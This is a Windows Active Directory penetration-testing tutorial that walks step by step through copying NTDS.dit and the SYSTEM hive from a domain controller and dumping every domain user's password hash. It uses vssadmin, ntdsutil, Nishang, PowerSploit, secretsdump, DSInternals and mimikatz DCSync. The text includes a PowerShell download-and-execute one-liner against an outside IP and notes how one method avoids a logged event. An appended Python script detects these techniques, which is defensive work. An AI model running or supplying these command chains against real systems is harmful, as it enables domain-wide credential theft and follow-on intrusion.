Intranet penetration test: get domain hash value from NTDS.dit


In this article, we will demonstrate how to obtain the Ntds.dit file on the domain controller and extract the domain account and password hash.

Ntds.dit
In a domain environment, Active Directory is the component that provides directory services, helping users find the information they need from the directory quickly and accurately. In a large network, the many objects on it, such as computers, users, user groups, printers and shared files, need to be sorted and stored in an orderly way in one large repository so that they can be indexed, searched, managed and used. The database with this hierarchical structure is the Active Directory database.

The Ntds.dit file is a binary file on a domain controller in a domain environment; it is the main Active Directory database. Its path on the domain controller is %SystemRoot%\ntds\ntds.dit. Active Directory keeps this file open at all times, so it cannot be read directly. Ntds.dit includes, but is not limited to, information about domain users, groups and group membership, credential information, GPP, etc. It includes the password hashes of all users in the domain. To further protect the password hashes, they are encrypted with a key stored in the SYSTEM registry hive.

In a non-domain (workgroup) environment, users' passwords and other information are stored in the SAM file. To crack either the SAM file or the Ntds.dit file, you also need the SYSTEM file. Like the SAM file, Ntds.dit is locked by the Windows system by default.

Use VSS technology to obtain NTDS.dit file
In general, Ntds.dit is locked by the Windows system by default. To read the file, you must use the Volume Shadow Copy Service (VSS) to obtain a copy of it. VSS is essentially a snapshot technology, mainly used for backup and recovery, and it works even when the target file is locked.

The basic steps to obtain Ntds.dit are as follows:

Create a shadow copy of the target host (covering all files on the Windows volume)
Then copy ntds.dit out of the created shadow copy
Finally delete the shadow copy that was created

Use the vssadmin tool
vssadmin is the command-line management tool for the Volume Shadow Copy Service on Windows. It can be used to create and delete shadow copies, list shadow copy information, display all installed shadow copy writers and providers, change the size of the shadow copy storage space, and so on.

It applies to: Windows 10, Windows 8.1, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2, Windows Server 2008

For details, please refer to: https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/vssadmin

The process of extracting the ntds.dit file from the domain controller using the vssadmin command is as follows, which requires domain administrator authority to operate:

1. Execute the following command on the domain controller (on which the required permissions have already been obtained) to create a shadow copy of the C drive:

vssadmin create shadow /for=C:

2. Then copy ntds.dit to C drive in the created shadow copy:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\ntds.dit

At this point, a copy of Ntds.dit was successfully copied.

3. Finally delete the shadow copy just created:

vssadmin delete shadows /for=c: /quiet

Use the vssown.vbs script
Download link: https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

https://github.com/borigue/ptscripts/tree/master/windows

The script essentially operates on ShadowCopy through WMI, and its function is similar to vssadmin: it can be used to create and delete shadow copies, and to start and stop the shadow copy service.

The process of extracting the ntds.dit file from the domain controller using the vssown.vbs script is as follows, which requires domain administrator authority to operate:

1. First, execute the following command on the domain controller to start the volume shadow copy service:

cscript vssown.vbs /start

The cscript command is used to run scripts in a command-line environment.

2. Then execute the following command to create a shadow copy of drive C:

cscript vssown.vbs /create c

Execute the following command to list the currently created shadow copies:

cscript vssown.vbs /list

As shown in the figure above, we can see a shadow copy with ID {D0E1B1B0-96B3-4A5E-988A-4DA2738A078D}, and the storage location is \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2.

3. Then copy ntds.dit to C drive in the created shadow copy:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit C:\ntds.dit

4. After getting the copy of Ntds.dit, delete the shadow copy just created:

cscript vssown.vbs /delete <ID>
cscript vssown.vbs /delete {D0E1B1B0-96B3-4A5E-988A-4DA2738A078D}

Use the Ntdsutil.exe tool
Ntdsutil.exe is a command-line tool that provides management facilities for Active Directory. It is installed on domain controllers by default. It can be run directly on the domain controller or used remotely against it from another machine in the domain, but it requires Administrator rights.

You can use Ntdsutil.exe to perform Active Directory database maintenance, manage and control individual host operations, create application directory partitions, and remove metadata left behind by domain controllers that were not successfully demoted with the Active Directory Installation Wizard (DCPromo.exe).

For details, please refer to: https://baike.baidu.com/item/Ntdsutil.exe/740430?fr=aladdin

The process of extracting the ntds.dit file from the domain controller using the Ntdsutil.exe tool is as follows, which requires domain administrator authority to operate:

1. First, execute the following command on the domain controller to create a snapshot:

ntdsutil snapshot "activate instance ntds" create quit quit

The snapshot contains all the files on the Windows volume and is not affected by the Windows locking mechanism when copying.

As shown in the figure above, you can see that a snapshot with ID {f3ce5a64-11d7-4bcf-9858-81442e40d6cb} was successfully created.

2. Then execute the following command to mount the snapshot just created:

ntdsutil snapshot "mount <ID>" quit quit

ntdsutil snapshot "mount {f3ce5a64-11d7-4bcf-9858-81442e40d6cb}" quit quit

At this point, the snapshot just created has been successfully mounted at the C:\$SNAP_202009291002_VOLUMEC$\ directory on the system.

3. Then execute the following command to copy the Ntds.dit file in the snapshot to C:\ntds.dit:

copy C:\$SNAP_202009291002_VOLUMEC$\windows\ntds\ntds.dit c:\ntds.dit

After we get a copy of the ntds.dit file, we can delete the snapshot we just created and loaded.

4. Finally, execute the following command to unmount and delete the snapshot created and mounted earlier:

ntdsutil snapshot "unmount <ID>" "delete <ID>" quit quit

ntdsutil snapshot "unmount {f3ce5a64-11d7-4bcf-9858-81442e40d6cb}" "delete {f3ce5a64-11d7-4bcf-9858-81442e40d6cb}" quit quit

Create IFM to extract Ntds.dit file
In addition to the operations above, you can also use Ntdsutil.exe to create an installation media set (IFM) to extract the NTDS.dit file. When ntdsutil creates an IFM set, it automatically takes a snapshot, mounts it, and copies ntds.dit together with the computer's SAM and SYSTEM files to the target folder, so we can use this process to obtain the NTDS.dit file. Administrator rights are required.

Ntdsutil is a command utility that processes Active Directory locally and enables IFM set creation for DCPromo. IFM is used with DCPromo to “install from media”, so the upgraded server does not need to replicate domain data from another DC over the network.

When an IFM is created, the VSS snapshot will be automatically taken, mounted, and the NTDS.DIT file and related data will be copied to the target folder.

Execute the following command in the domain controller:

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

After executing this command, the ntds.dit file is automatically copied to C:\test\Active Directory\ntds.dit, and the SYSTEM and SECURITY hives are copied to the C:\test\registry directory.

Then execute the following command to copy ntds.dit to C:\ntds.dit

copy "C:\test\Active Directory\ntds.dit" C:\ntds.dit

Finally, after transferring the files we need to our local machine, delete the test folder.

Implementation under PowerShell
The Copy-VSS.ps1 script in Nishang can be used to automatically extract the necessary files: NTDS.DIT, SAM and SYSTEM. These files are extracted to the current working directory or to any other specified folder.

Download link: https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1

The script is used as follows:

IEX (New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/Nishang/Gather/Copy-VSS.ps1');Copy-VSS

As shown in the figure above, after successful execution, the SAM, SYSTEM, and Ntds.dit files will be copied to the same directory as the script.

You can also copy the SAM, SYSTEM, Ntds.dit files to the specified directory:

Copy-VSS -DestinationDir C:\

In addition to the Copy-VSS.ps1 script, we can also use the Invoke-NinjaCopy script in PowerSploit.

Download link: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

This script performs a “universal copy” of files such as the SAM file on a Windows host and the Ntds.dit on a domain controller. These files contain a lot of valuable information, and ordinary COPY commands cannot copy them; universal copy can. The script is used as follows:

Invoke-NinjaCopy -Path <Files to be copied> -LocalDestination <Where to save the copied files>

Use this script to copy the Ntds.dit and SYSTEM files:

Import-Module .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\ntds.dit"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\system.hive"

As shown above, the copy is successful.

This method does not call the Volume Shadow Copy service, so no event 7036 (which records the Volume Shadow Copy service entering the running state) is generated.

Export SYSTEM file
After exporting ntds.dit, you also need to export the SYSTEM hive and dump it as system.hive, because the key for ntds.dit is stored in it.

We can use the Copy-VSS.ps1 script mentioned above to export the SYSTEM file, or execute the following command to export it:

reg save hklm\system c:\system.hive

Use the tool to export the hash value in the Ntds.dit file
So far we have learned several methods of extracting the Ntds.dit file. Once we have the Ntds.dit file from the domain controller, the next task is to export the password hashes from it.

Use Esedbexport and Ntdsxtract tools
(1) Restore ntds.dit and export user table information

First, we need to extract the user table from the NTDS.dit file; the esedbexport tool from libesedb-tools does this for us. libesedb is a library for accessing the Extensible Storage Engine (ESE) Database File (EDB) format. The ESE database format is currently used by many different applications, such as Windows Search, Windows Mail, Exchange and Active Directory (NTDS.dit).

Download link: https://github.com/libyal/libesedb/releases

First install esedbexport on Kali (the tarball has to be unpacked before entering its directory):

apt-get install autoconf automake autopoint libtool pkg-config
wget https://github.com/libyal/libesedb/releases/download/20200418/libesedb-experimental-20200418.tar.gz
tar -xzf libesedb-experimental-20200418.tar.gz
cd libesedb-20200418
./configure
make && make install && ldconfig

After the installation is complete, enter the directory where ntds.dit is stored and execute the following command to parse ntds.dit and extract its tables:

esedbexport -m tables ntds.dit   # Extract table information

The tables are extracted successfully, as shown in the figure above, and an “ntds.dit.export” folder is generated in the current directory:

In the above figure, we can see that there are many tables, and the tables we need to use later are the two tables datatable.3 and link_table.5.

(2) Derive the domain hash value

Once the tables in ntds.dit have been extracted, many Python tools can process them further to derive the domain hashes; ntdsxtract, for example, does this well. This tool can extract information related to user objects, group objects and computer objects, and can also extract deleted objects from the NTDS.dit file.

Installation command:

git clone https://github.com/csababarta/ntdsxtract.git
cd ntdsxtract/
python setup.py build && python setup.py install

After the installation is complete, put the two tables datatable.3 and link_table.5 from the “ntds.dit.export” folder exported in the previous step, together with the previously obtained “SYSTEM” file, into the ntdsxtract folder. Then execute the following command to export all users and hashes in the domain to the result.txt file:

dsusers.py <datatable> <link_table> <output_dir> --syshive <systemhive> --passwordhashes <format options>   # Command format

python dsusers.py datatable.3 link_table.5 output --syshive system.hive --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout | tee result.txt

The --pwdformat option selects the output format. There are three options: john (John the Ripper format), ocl (oclHashcat) and ophc (OphCrack).

As shown in the figure above, all users and password hashes in the domain are successfully exported. The extracted hashes can be cracked with tools such as hashcat. For details, please see another article of mine: “Research on Lateral Movement of Intranet: Obtaining Single-Server Password and Hash in the Domain”.

Since Ntds.dit includes, but is not limited to, information about domain users, groups and group membership, credential information, GPP, etc., we can not only use Ntds.dit to obtain password hashes but also analyze it to export information about all the other computers in the domain, which is very helpful for information gathering in the domain.

Ntdsxtract also has a “dscomputers.py” tool that can extract computer information in the domain from the separated table. This is very useful for offline analysis of target information.

In the process of use, it needs to provide datatable, output directory and output file. The format of the output file is csv:

python dscomputers.py datatable.3 computer_output --csvoutfile domain_computers_info.csv

Note that to export the domain hashes from the Ntds.dit tables with Ntdsxtract, three files must be provided: datatable.3 and link_table.5 from the ntds.dit.export folder exported from Ntds.dit, and the previously obtained “SYSTEM” file.

Use secretsdump in Impacket
Download link: https://github.com/SecureAuthCorp/impacket

secretsdump.py is a script in the Impacket toolkit that implements a variety of techniques for dumping secrets without running any agent on the remote host. For SAM and LSA Secrets (including cached credentials), it reads from the registry as much as possible, then saves the hives on the target system (in the %SYSTEMROOT%\Temp directory) and reads the remaining data from there.

secretsdump.py has a LOCAL option to parse the Ntds.dit file and extract the hashes and domain information from it. Before that, we must obtain the two files Ntds.dit and SYSTEM. Once we have them, we can execute the following command:

python secretsdump.py -system /directory/system.hive -ntds /directory/ntds.dit LOCAL

As shown above, the script successfully displays the NTLM hash values of all users in the domain.

Implementation under PowerShell
The DSInternals PowerShell module provides easy-to-use cmdlets built on its framework. Its main functions include offline operations on the ntds.dit file and querying the domain controller through the Directory Replication Service (DRS) Remote Protocol.

Download link: https://github.com/MichaelGrafnetter/DSInternals

Supported systems:

  • Windows Server 2012 R2
  • Windows Server 2008 R2
  • Windows 10 64-bit
  • Windows 8.1 64-bit
  • Windows 7 64-bit

Installation and configuration method:

PowerShell 5.0:
Install-Module DSInternals
or
Install-Module -Name DSInternals -RequiredVersion 3.2.1

PowerShell 3.0, 4.0:
Unzip the compressed package, then:
cd C:\DSInternals
Import-Module .\DSInternals

For details, please refer to: https://www.powershellgallery.com/packages/dsinternals/3.2.1

To extract user hashes with the DSInternals module, we first need the two files Ntds.dit and SYSTEM. After exporting these two files and transferring them to our local machine, execute the following commands to obtain all account hashes:

Import-Module DSInternals   # Import the DSInternals module
# Get all account information:
$key = Get-Bootkey -SystemHivePath 'C:\directory\system.hive'
Get-ADDBAccount -All -DBPath 'C:\directory\ntds.dit' -BootKey $key

You can also export hashes that support the Hashcat format:

$key = Get-Bootkey -SystemHivePath 'C:\directory\system.hive'

Get-ADDBAccount -All -DBPath 'C:\directory\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File hashes.txt

An error was reported on my computer here, so it won’t reproduce.

The hash extraction methods described above are all offline extraction. Offline extraction generally requires two steps: first export ntds.dit from the remote domain controller using shadow copies or a similar technique and download it locally, then run the extraction locally. Next, let us summarize the methods of extracting the hashes in ntds.dit online.

Extract the hash in Ntds.dit online
Use dcsync to obtain and extract the hash in Ntds.dit
DCSync is a feature added to Mimikatz in 2015, co-written by Benjamin DELPY (gentilkiwi) and Vincent LE TOUX. It can use the volume shadow copy service to directly read ntds.dit and export the hashes of all users in the domain. Administrator rights are required.

Mimikatz download address: https://github.com/gentilkiwi/mimikatz

Using Mimikatz's dcsync function to obtain and extract the hashes in Ntds.dit works as follows:

1. Run mimikatz on any host in the domain and execute the following command:

lsadump::dcsync /domain:xxx.com /all /csv

lsadump::dcsync /domain:god.org /all /csv

As shown in the figure above, the hash values of all users in the domain are successfully derived.

Implementation under PowerShell
That is, the Invoke-DCSync.ps1 script.

Download link: https://gist.github.com/monoxgas/9d238accd969550136db

The script calls the dcsync function in mimikatz.dll through Invoke-ReflectivePEInjection, and uses dcsync to read ntds.dit directly to obtain the domain users' password hashes.

Execute the following commands on any host in the domain:

Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -DumpForest | ft -wrap -autosize   # Export the hashes of all users in the domain

Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize   # Export the hash of the administrator account in the domain

As shown in the figure above, the hashes of all users in the domain are successfully extracted.
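From the defender's side, the techniques above leave distinct traces: vssadmin, ntdsutil and the copy from the shadow device appear in process-creation command lines, the VSS service start is the 7036 event mentioned earlier (which Invoke-NinjaCopy does not produce), and a DCSync request shows up as a replication right being exercised by an account that is not a domain controller. The following detection logic is an added example and not part of the original article; the event dict schema and the sample records are constructed, and the two replication-right GUIDs are assumed to appear in the Properties field of the 4662 event.

```python
"""Detection logic for the NTDS.dit extraction techniques on this page. Added example,
not from the original article. Events are constructed dict records; the field names
(host, event_id, subject, command_line, message, properties) are assumptions."""
import re
from collections import defaultdict

# Command-line signatures of the extraction methods shown in this article (4688 = process creation).
EXTRACTION_PATTERNS = {
    "vss_shadow_create": re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I),
    "ntdsutil_snapshot_or_ifm": re.compile(r"ntdsutil.*(snapshot|\bifm\b|create\s+full)", re.I),
    "copy_from_shadow": re.compile(r"HarddiskVolumeShadowCopy\d+\\.*ntds\.dit", re.I),
    "system_hive_export": re.compile(r"reg(\.exe)?\s+save\s+hklm\\system", re.I),
    "ninjacopy_ntds": re.compile(r"Invoke-NinjaCopy.*ntds\.dit", re.I),
}
# Extended rights a DCSync caller needs (well-known AD rightsGuid values; assumed to
# appear in the Properties field of a 4662 "operation on an AD object" event).
REPLICATION_RIGHTS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
                      "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")  # DS-Replication-Get-Changes-All

def classify(event):
    """Return the detection tags that apply to one event (empty list if none)."""
    eid = event["event_id"]
    if eid == 4688:
        cmd = event.get("command_line", "")
        return [tag for tag, pat in EXTRACTION_PATTERNS.items() if pat.search(cmd)]
    if eid == 7036:  # the VSS service start the article mentions; Invoke-NinjaCopy never triggers it
        msg = event.get("message", "").lower()
        return ["vss_service_started"] if "volume shadow copy" in msg and "running state" in msg else []
    if eid == 4662:
        # DCs (computer accounts ending in "$") replicate legitimately; a user account is the DCSync signal.
        props = event.get("properties", "").lower()
        if any(g in props for g in REPLICATION_RIGHTS) and not event["subject"].endswith("$"):
            return ["dcsync_by_user_account"]
    return []

def detect(events):
    """Flat list of (host, event_id, tag) alerts over a sequence of events."""
    return [(ev["host"], ev["event_id"], tag) for ev in events for tag in classify(ev)]

def hosts_copied_without_vss_event(events):
    """Hosts where ntds.dit was copied but no 7036 appeared: a 7036-only rule misses these."""
    tags = defaultdict(set)
    for ev in events:
        tags[ev["host"]].update(classify(ev))
    return sorted(h for h, t in tags.items()
                  if t & {"copy_from_shadow", "ninjacopy_ntds"} and "vss_service_started" not in t)

# Constructed sample events mirroring the commands in this article.
SAMPLE_EVENTS = [
    {"host": "DC01", "event_id": 4688, "subject": "CORP\\jdoe", "command_line": "vssadmin create shadow /for=C:"},
    {"host": "DC01", "event_id": 7036, "subject": "", "message": "The Volume Shadow Copy service entered the running state."},
    {"host": "DC01", "event_id": 4688, "subject": "CORP\\jdoe",
     "command_line": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\ntds.dit"},
    {"host": "DC01", "event_id": 4688, "subject": "CORP\\jdoe", "command_line": r"reg save hklm\system c:\system.hive"},
    {"host": "DC02", "event_id": 4688, "subject": "CORP\\jdoe",
     "command_line": r'powershell Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\ntds.dit"'},
    {"host": "DC01", "event_id": 4662, "subject": "CORP\\jdoe",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"host": "DC01", "event_id": 4662, "subject": "CORP\\DC02$", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]
```

Running detect(SAMPLE_EVENTS) flags every extraction step on DC01 plus the NinjaCopy read on DC02 and the user-account DCSync, while the DC02$ replication passes as normal; hosts_copied_without_vss_event shows DC02 as the host a 7036-only rule would have missed.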

Ending…
In this article, we have summarized how to obtain the Ntds.dit file on the domain controller and extract the domain account and password hash.

The obtained password hash can be cracked with tools such as hashcat. For details, please see another article of mine: “Research on Lateral Movement of Intranet: Obtaining Single-Server Password and Hash in the Domain“.
